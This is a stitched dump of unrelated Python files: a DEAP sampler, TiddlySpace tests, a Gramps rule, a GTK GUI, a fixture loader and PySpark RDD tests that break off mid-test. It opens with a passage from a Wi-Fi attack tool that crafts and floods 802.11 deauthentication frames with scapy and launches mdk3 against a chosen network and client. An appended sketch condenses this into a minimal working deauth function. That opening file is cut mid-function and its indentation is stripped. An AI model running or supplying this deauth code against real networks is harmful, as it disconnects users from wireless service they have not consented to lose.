Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
cap = []
self.ap_list = []
else:
self.thread_airodump = threading.Thread(target=self.scan_diveces_airodump)
self.thread_airodump.daemon = True
self.thread_airodump.start()
def Scanner_devices(self,pkt):
if pkt.type == 0 and pkt.subtype == 8:
if pkt.addr2 not in self.ap_list:
self.ap_list.append(pkt.addr2)
self.ap_list.append(str(int(ord(pkt[Dot11Elt:3].info)))+" | " + pkt.info)
print "AP MAC: %s with SSID: %s CH %d"%(pkt.addr2, pkt.info, int(ord(pkt[Dot11Elt:3].info)))
def attack_deauth(self):
if self.linetarget.text() == "":
            QMessageBox.information(self, "Target Error", "Please select a target for the attack first")
else:
self.ss = None
if self.w_pacote.currentText() == "infinite loop":
self.ss = 1
else:
self.ss = int(self.w_pacote.currentText())
self.bssid = str(self.linetarget.text())
self.deauth_check = self.xmlcheck.xmlSettings("item0", "deauth_scapy",None,False)
self.args = self.xmlcheck.xmlSettings("mdk3","arguments", None, False)
if self.deauth_check == "True":
self.controlador.setText("[ ON ]")
self.controlador.setStyleSheet("QLabel { color : green; }")
self.t = threading.Thread(target=self.deauth_attacker, args=(self.bssid,str(self.input_client.text()), self.ss))
self.t.daemon = True
self.t.start()
else:
self.controlador.setText("[ ON ]")
self.controlador.setStyleSheet("QLabel { color : green; }")
self.t = threading.Thread(target=self.mdk3_attacker, args=(self.bssid,self.args,))
self.t.daemon = True
self.t.start()
def attack_OFF(self):
self.controlador.setText("[ OFF ]")
self.controlador.setStyleSheet("QLabel { color : red; }")
system("clear")
def mdk3_attacker(self,bssid,args):
n = (popen("""sudo xterm -geometry 75x15-1+200 -T "mdk3 Target: %s" -e mdk3 wlan0 %s %s & mdk3=$!"""%(bssid,args,bssid)).read()) + "exit"
while n != "dsa":
if n == "exit":
self.attack_OFF()
break
def deauth_attacker(self,bssid, client, count):
self.control = None
bot = 0
conf.verb = 0
conf.iface = self.interface
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
deauth_ap = Dot11(addr1=bssid, addr2=bssid, addr3=bssid)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=bssid, addr2=client, addr3=client)/Dot11Deauth()
self.pacote.append(deauth_pkt2)
self.pacote.append(deauth_ap)
if count == 1:
while count != 0:
try:
sendp(packet)
print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client
if self.control == None:
pass
else:
self.attack_OFF()
count = 0
popen("clear")
except KeyboardInterrupt:
print "::"
sys.exit()
else:
for n in range(int(count)):
try:
sendp(packet)
print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client
if self.control == None:
pass
else:
self.attack_OFF()
popen("clear")
break
except KeyboardInterrupt:
print "::"
sys.exit()
self.attack_OFF()
def check_is_mac(self,value):
checked = re.compile(r"""(
^([0-9A-F]{2}[-]){5}([0-9A-F]{2})$
|^([0-9A-F]{2}[:]){5}([0-9A-F]{2})$
)""",
re.VERBOSE|re.IGNORECASE)
if checked.match(value) is None:
return False
else:
return True
@pyqtSlot(QModelIndex)
def list_clicked(self, index):
itms = self.list.selectedIndexes()
for i in itms:
attack = str(i.data().toString()).split()
for i in attack:
if self.check_is_mac(i.replace(" ", "")):
self.linetarget.setText(str(i))
if self.linetarget.text() == "":
            QMessageBox.information(self, "MacAddress", "Error checking the target MAC, please enter a valid MAC address.")
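# Editor's sketch (illustration only, not part of the tool): the deauth attack
# implemented in deauth_attacker() boils down to crafting one 802.11
# management frame (type 0, subtype 12) and replaying it. The interface name
# and MAC addresses below are placeholders.
def _example_single_deauth(iface="wlan0mon", bssid="AA:BB:CC:DD:EE:FF",
                           client="FF:FF:FF:FF:FF:FF"):
    pkt = RadioTap() / Dot11(type=0, subtype=12, addr1=client, addr2=bssid,
                             addr3=bssid) / Dot11Deauth(reason=7)
    # count/inter control how many frames are sent and the delay between them.
    sendp(pkt, iface=iface, count=10, inter=0.1, verbose=False)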
| hackerbolt-freelancer/PEH-wifi-attack | Modules/deauth_func.py | Python | mit | 15,370 |
from deap_algorithm import DeapAlgorithm
import numpy as np
import random
from deap import base
from deap import creator
from deap import tools
####Parameter
#Num_evaluations
class RandomSampler(DeapAlgorithm):
def __init__(self):
super(RandomSampler, self).__init__()
self.bootstrap_deap()
def _generate_individual(self):
ind = creator.Individual(random.uniform(0,self.config['grid_size'][i]) for i in range(2))
return ind
def bootstrap_deap(self):
creator.create("FitnessMinError", base.Fitness, weights=(-1.0,))
creator.create("Individual", list, fitness=creator.FitnessMinError)
self.toolbox = base.Toolbox()
self.toolbox.register("individual", self._generateIndividual)
self.toolbox.register("population", tools.initRepeat, list, self.toolbox.individual)
self.toolbox.register("select", tools.selBest)
def run(self, case, logger):
self.config['grid_size'] = case.config['grid_size']
self.toolbox.register("evaluate", case.fitness)
#Create a population of random individuals
pop = self.toolbox.population(n=case.getMaxEvalutions())
# Evaluate the individuals
fitnesses = self.toolbox.map(self.toolbox.evaluate, pop)
for ind, fit in zip(pop, fitnesses):
ind.fitness.values = fit
#Pick the best individual
best_ind = tools.selBest(pop, 1)[0]
if logger is not None:
logger.updateLog( pop, 0, len(pop))
return pop, best_ind, best_ind.fitness.values[0]
def get_configs(self, case):
configs = []
config = {}
configs.append(config)
return configs
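# Editor's sketch (not part of the module): the minimal "case" contract the
# sampler relies on, inferred from run() and get_configs() above -- a
# fitness() returning a 1-tuple, getMaxEvalutions() giving the evaluation
# budget and a config['grid_size'] pair bounding the random individuals.
class _ExampleCase(object):
    config = {'grid_size': (100.0, 100.0)}
    def getMaxEvalutions(self):
        return 50
    def fitness(self, individual):
        # Toy objective: squared distance from the grid centre (minimised).
        return (sum((x - 50.0) ** 2 for x in individual),)
# sampler = RandomSampler()
# pop, best, best_fitness = sampler.run(_ExampleCase(), logger=None)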
| ForsvaretsForskningsinstitutt/Paper-NLLS-speedup | algorithms/random_sampler.py | Python | gpl-3.0 | 1,799 |
from test.fixtures import make_test_env, make_fake_space
from wsgi_intercept import httplib2_intercept
import wsgi_intercept
import httplib2
import simplejson
from base64 import b64encode
from tiddlyweb.model.bag import Bag
from tiddlyweb.model.tiddler import Tiddler
from tiddlyweb.model.user import User
def setup_module(module):
make_test_env(module)
httplib2_intercept.install()
wsgi_intercept.add_wsgi_intercept('0.0.0.0', 8080, app_fn)
wsgi_intercept.add_wsgi_intercept('cdent.0.0.0.0', 8080, app_fn)
wsgi_intercept.add_wsgi_intercept('bar.example.com', 8080, app_fn)
make_fake_space(module.store, 'cdent')
user = User('cdent')
user.set_password('cow')
module.store.put(user)
module.auth = b64encode('cdent:cow')
user = User('fnd')
user.set_password('pig')
module.store.put(user)
module.badauth = b64encode('fnd:pig')
module.http = httplib2.Http()
def teardown_module(module):
import os
os.chdir('..')
def test_mapspace_bag_correct():
bag = store.get(Bag('MAPSPACE'))
assert bag.name == 'MAPSPACE'
assert bag.policy.create == ['ANY']
assert bag.policy.write == ['NONE']
def test_mapspace_validator():
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/foo.example.com',
method='PUT',
headers={'Content-Type': 'application/json'},
body='{"text": ""}')
# cannot create without user
assert response['status'] == '403'
# can create with user
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/foo.example.com',
method='PUT',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic %s' % auth},
body='{"text": ""}')
assert response['status'] == '204'
# cannot write even with user
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/foo.example.com',
method='PUT',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic %s' % auth},
body='{"text": ""}')
assert response['status'] == '403'
tiddler = store.get(Tiddler('foo.example.com', 'MAPSPACE'))
assert tiddler.fields['mapped_space'] == 'cdent'
def test_mapspace_non_member():
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/bar.example.com',
method='PUT',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic %s' % badauth},
body='{"text": ""}')
assert response['status'] == '409'
    assert 'non member may not map space' in content
def test_mapspace_twice():
response, content = http.request(
'http://cdent.0.0.0.0:8080/bags/MAPSPACE/tiddlers/bar.example.com',
method='PUT',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic %s' % auth},
body='{"text": ""}')
assert response['status'] == '204'
tiddler = store.get(Tiddler('bar.example.com', 'MAPSPACE'))
assert tiddler.fields['mapped_space'] == 'cdent'
def test_mapspace_maps():
response, content = http.request('http://cdent.0.0.0.0:8080/bags.json')
assert response['status'] == '200', content
info = simplejson.loads(content)
assert 'cdent_public' in info
response, content = http.request('http://bar.example.com:8080/bags.json')
assert response['status'] == '200'
info = simplejson.loads(content)
assert 'cdent_public' in info
| FND/tiddlyspace | test/test_mapspace.py | Python | bsd-3-clause | 3,636 |
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2006 Donald N. Allingham
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id: _HasCitation.py 18548 2011-12-04 17:09:17Z kulath $
"""
Filter rule to match a place with a particular citation.
"""
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....ggettext import gettext as _
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from .._hascitationbase import HasCitationBase
#-------------------------------------------------------------------------
#
# HasEvent
#
#-------------------------------------------------------------------------
class HasCitation(HasCitationBase):
"""Rule that checks for a family with a particular value"""
labels = [ _('Volume/Page:'),
_('Date:'),
_('Confidence level:')]
name = _('Place with the <citation>')
description = _("Matches places with a citation of a particular "
"value")
| arunkgupta/gramps | gramps/gen/filters/rules/place/_hascitation.py | Python | gpl-2.0 | 1,939 |
#
# Copyright (c) 2011 xGrab Development Team
#
# This file is part of xGrab
#
# xGrab is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# xGrab is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with xGrab. If not, see <http://www.gnu.org/licenses/>.
#
import gtk
from xgrab import data_file_path
class GtkGUI:
""" xGrab GUI """
def __init__(self):
""" Initialize the GUI """
glade_file = data_file_path('main.glade')
builder = gtk.Builder()
builder.add_from_file(glade_file)
builder.connect_signals(self)
@classmethod
def gtk_main_quit(cls, error):
""" Handle quit event """
gtk.main_quit()
| EverlastingFire/xGrab | xgrab/gui.py | Python | gpl-3.0 | 1,116 |
#!/usr/bin/env python
# coding: utf-8
from __future__ import (
print_function,
unicode_literals,
absolute_import
)
import argparse
import json
import os
def get_path():
return unicode(os.path.abspath('.'))
def parse_args():
_parser = argparse.ArgumentParser()
_parser.add_argument('--fixture', type=str, help='fixture file to load', default='properties.json')
_parser.add_argument('--fixture_folder', type=str,
default='models/fixtures',
help='where fixtures are stored.'
)
return _parser.parse_args()
def main(base_path):
properties_to_save = []
args = parse_args()
path = os.path.sep.join([base_path,
'app',
args.fixture_folder,
args.fixture])
with open(path) as file_:
data = json.load(file_)
properties = data['properties']
for property_ in properties:
property_.pop('id')
properties_to_save.append(Property(**property_))
Property.objects.insert(properties_to_save)
return len(properties_to_save)
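# Editor's note (assumption about the fixture shape): main() expects a JSON
# document of the form {"properties": [{"id": ..., <Property fields>}, ...]};
# the "id" key is stripped before the remaining fields are passed to
# Property(**property_).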
if __name__ == '__main__':
from app.models.properties import Property
base_path = get_path()
out = main(base_path)
print("{} objects saved".format(out)) | IuryAlves/code-challenge | app/load_data.py | Python | mit | 1,329 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import datetime, timedelta
import hashlib
import os
import random
import sys
import tempfile
import time
from glob import glob
from py4j.protocol import Py4JJavaError
from pyspark import shuffle, RDD
from pyspark.resource import ExecutorResourceRequests, ResourceProfile, ResourceProfileBuilder,\
TaskResourceRequests
from pyspark.serializers import CloudPickleSerializer, BatchedSerializer, PickleSerializer,\
MarshalSerializer, UTF8Deserializer, NoOpSerializer
from pyspark.testing.utils import ReusedPySparkTestCase, SPARK_HOME, QuietTest
if sys.version_info[0] >= 3:
xrange = range
global_func = lambda: "Hi"
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_to_localiterator(self):
rdd = self.sc.parallelize([1, 2, 3])
it = rdd.toLocalIterator()
self.assertEqual([1, 2, 3], sorted(it))
rdd2 = rdd.repartition(1000)
it2 = rdd2.toLocalIterator()
self.assertEqual([1, 2, 3], sorted(it2))
def test_to_localiterator_prefetch(self):
# Test that we fetch the next partition in parallel
# We do this by returning the current time and:
# reading the first elem, waiting, and reading the second elem
# If not in parallel then these would be at different times
# But since they are being computed in parallel we see the time
# is "close enough" to the same.
rdd = self.sc.parallelize(range(2), 2)
times1 = rdd.map(lambda x: datetime.now())
times2 = rdd.map(lambda x: datetime.now())
times_iter_prefetch = times1.toLocalIterator(prefetchPartitions=True)
times_iter = times2.toLocalIterator(prefetchPartitions=False)
times_prefetch_head = next(times_iter_prefetch)
times_head = next(times_iter)
time.sleep(2)
times_next = next(times_iter)
times_prefetch_next = next(times_iter_prefetch)
self.assertTrue(times_next - times_head >= timedelta(seconds=2))
self.assertTrue(times_prefetch_next - times_prefetch_head < timedelta(seconds=1))
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_cartesian_chaining(self):
# Tests for SPARK-16589
rdd = self.sc.parallelize(range(10), 2)
self.assertSetEqual(
set(rdd.cartesian(rdd).cartesian(rdd).collect()),
set([((x, y), z) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.cartesian(rdd)).collect()),
set([(x, (y, z)) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.zip(rdd)).collect()),
set([(x, (y, y)) for x in range(10) for y in range(10)])
)
def test_zip_chaining(self):
# Tests for SPARK-21985
rdd = self.sc.parallelize('abc', 2)
self.assertSetEqual(
set(rdd.zip(rdd).zip(rdd).collect()),
set([((x, x), x) for x in 'abc'])
)
self.assertSetEqual(
set(rdd.zip(rdd.zip(rdd)).collect()),
set([(x, (x, x)) for x in 'abc'])
)
def test_union_pair_rdd(self):
# SPARK-31788: test if pair RDDs can be combined by union.
rdd = self.sc.parallelize([1, 2])
pair_rdd = rdd.zip(rdd)
unionRDD = self.sc.union([pair_rdd, pair_rdd])
self.assertEqual(
set(unionRDD.collect()),
set([(1, 1), (2, 2), (1, 1), (2, 2)])
)
self.assertEqual(unionRDD.count(), 4)
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy(blocking=True)
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_multithread_broadcast_pickle(self):
import threading
b1 = self.sc.broadcast(list(range(3)))
b2 = self.sc.broadcast(list(range(3)))
def f1():
return b1.value
def f2():
return b2.value
funcs_num_pickled = {f1: None, f2: None}
def do_pickle(f, sc):
command = (f, None, sc.serializer, sc.serializer)
ser = CloudPickleSerializer()
ser.dumps(command)
def process_vars(sc):
broadcast_vars = list(sc._pickled_broadcast_vars)
num_pickled = len(broadcast_vars)
sc._pickled_broadcast_vars.clear()
return num_pickled
def run(f, sc):
do_pickle(f, sc)
funcs_num_pickled[f] = process_vars(sc)
# pickle f1, adds b1 to sc._pickled_broadcast_vars in main thread local storage
do_pickle(f1, self.sc)
# run all for f2, should only add/count/clear b2 from worker thread local storage
t = threading.Thread(target=run, args=(f2, self.sc))
t.start()
t.join()
# count number of vars pickled in main thread, only b1 should be counted and cleared
funcs_num_pickled[f1] = process_vars(self.sc)
self.assertEqual(funcs_num_pickled[f1], 1)
self.assertEqual(funcs_num_pickled[f2], 1)
self.assertEqual(len(list(self.sc._pickled_broadcast_vars)), 0)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regress test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
